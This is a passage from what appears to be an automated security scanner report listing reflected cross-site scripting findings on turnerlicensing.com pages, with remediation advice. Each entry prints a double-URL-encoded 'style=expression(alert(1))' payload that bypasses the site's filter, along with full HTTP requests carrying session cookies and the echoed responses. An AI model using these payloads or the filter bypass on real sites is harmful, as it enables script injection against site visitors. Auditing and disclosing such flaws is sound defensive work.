There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Utah?d76ae%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279da4365e664=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:49 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 328769207:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=925
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 109978


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Utah</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175750&d76ae%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279da4365e664=1&d76ae'style='x:expression(alert(1))'9da4365e664=1&fromsla=T&d76ae%27style%3d%27x%3aexpression%28alert%281%29%29%279da4365e664=1'>
...[SNIP]...

1.126. http://www.turnerlicensing.com/teams_by_state/Vancouver [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Vancouver

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d512d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270ec04acb8d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d512d'style='x:expression(alert(1))'0ec04acb8d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Vancouver?d512d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270ec04acb8d9=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:42 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -2034775682:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=933
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 82072


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Vancouver</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=261600&d512d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270ec04acb8d9=1&d512d%27style%3d%27x%3aexpression%28alert%281%29%29%270ec04acb8d9=1&d512d'style='x:expression(alert(1))'0ec04acb8d9=1&fromsla=T'>
...[SNIP]...

1.127. http://www.turnerlicensing.com/teams_by_state/Vermont [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Vermont

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72a41%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252734af1748ca7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72a41'style='x:expression(alert(1))'34af1748ca7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Vermont?72a41%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252734af1748ca7=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:40 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 328766735:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=960
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54501


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Vermont</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175751&72a41%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252734af1748ca7=1&72a41%27style%3d%27x%3aexpression%28alert%281%29%29%2734af1748ca7=1&72a41'style='x:expression(alert(1))'34af1748ca7=1&fromsla=T'>
...[SNIP]...

1.128. http://www.turnerlicensing.com/teams_by_state/Virginia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Virginia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b052%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f30387b07b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b052'style='x:expression(alert(1))'f30387b07b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Virginia?6b052%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f30387b07b1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:49 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 1222461688:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=992
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110341


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Virginia</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175753&6b052%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f30387b07b1=1&6b052%27style%3d%27x%3aexpression%28alert%281%29%29%27f30387b07b1=1&6b052'style='x:expression(alert(1))'f30387b07b1=1&fromsla=T'>
...[SNIP]...

1.129. http://www.turnerlicensing.com/teams_by_state/Washington [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Washington

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6fa0b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271b3031fc933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fa0b'style='x:expression(alert(1))'1b3031fc933 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Washington?6fa0b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271b3031fc933=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:51 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 1114207312:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=965
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111137


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Washington</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175754&6fa0b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271b3031fc933=1&6fa0b'style='x:expression(alert(1))'1b3031fc933=1&6fa0b%27style%3d%27x%3aexpression%28alert%281%29%29%271b3031fc933=1&fromsla=T'>
...[SNIP]...

1.130. http://www.turnerlicensing.com/teams_by_state/Washington-D-C [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Washington-D-C

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9be7f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e43a7f2732a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9be7f'style='x:expression(alert(1))'e43a7f2732a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Washington-D-C?9be7f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e43a7f2732a=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:53 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 772670783:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=907
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 98552


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Washington D.C.</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175755&9be7f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e43a7f2732a=1&9be7f'style='x:expression(alert(1))'e43a7f2732a=1&9be7f%27style%3d%27x%3aexpression%28alert%281%29%29%27e43a7f2732a=1&fromsla=T'>
...[SNIP]...

1.131. http://www.turnerlicensing.com/teams_by_state/West-Virginia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/West-Virginia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3347%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276cb889a7789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3347'style='x:expression(alert(1))'6cb889a7789 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/West-Virginia?e3347%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276cb889a7789=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:56 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -1699126261:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=758
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110374


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>West Virginia</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scri
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175756&e3347%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276cb889a7789=1&e3347%27style%3d%27x%3aexpression%28alert%281%29%29%276cb889a7789=1&e3347'style='x:expression(alert(1))'6cb889a7789=1&fromsla=T'>
...[SNIP]...

1.132. http://www.turnerlicensing.com/teams_by_state/Wisconsin [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Wisconsin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9a45e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527841fffba0cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a45e'style='x:expression(alert(1))'841fffba0cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Wisconsin?9a45e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527841fffba0cf=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:56 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -109238793:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=749
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110580


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wisconsin</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175758&9a45e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527841fffba0cf=1&9a45e'style='x:expression(alert(1))'841fffba0cf=1&fromsla=T&9a45e%27style%3d%27x%3aexpression%28alert%281%29%29%27841fffba0cf=1'>
...[SNIP]...

1.133. http://www.turnerlicensing.com/teams_by_state/Wyoming [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Wyoming

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17380%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710b3c762605 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17380'style='x:expression(alert(1))'10b3c762605 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Wyoming?17380%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710b3c762605=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:52 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -811325613:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=998
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54501


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wyoming</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
nsing.com/s.nl?sc=77&category=175759&17380%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710b3c762605=1&17380%27style%3d%27x%3aexpression%28alert%281%29%29%2710b3c762605=1&fromsla=T&17380'style='x:expression(alert(1))'10b3c762605=1'>
...[SNIP]...

1.134. http://www.turnerlicensing.com/turner [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5edf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6b4ca84651 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5edf2'style='x:expression(alert(1))'d6b4ca84651 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner?5edf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6b4ca84651=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:55 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 772671243:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=955
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 41652


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Homepage - Turner</title>


<meta name=...robots... content=...NOODP,NOYDIR...>
<script language='JavaScript'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/turner?5edf2%27style%3d%27x%3aexpression%28alert%281%29%29%27d6b4ca84651=1&5edf2'style='x:expression(alert(1))'d6b4ca84651=1'>
...[SNIP]...

1.135. http://www.turnerlicensing.com/turner_about_us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_about_us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 12db7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527560f4d45a75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12db7'style='x:expression(alert(1))'560f4d45a75 in the application's response.

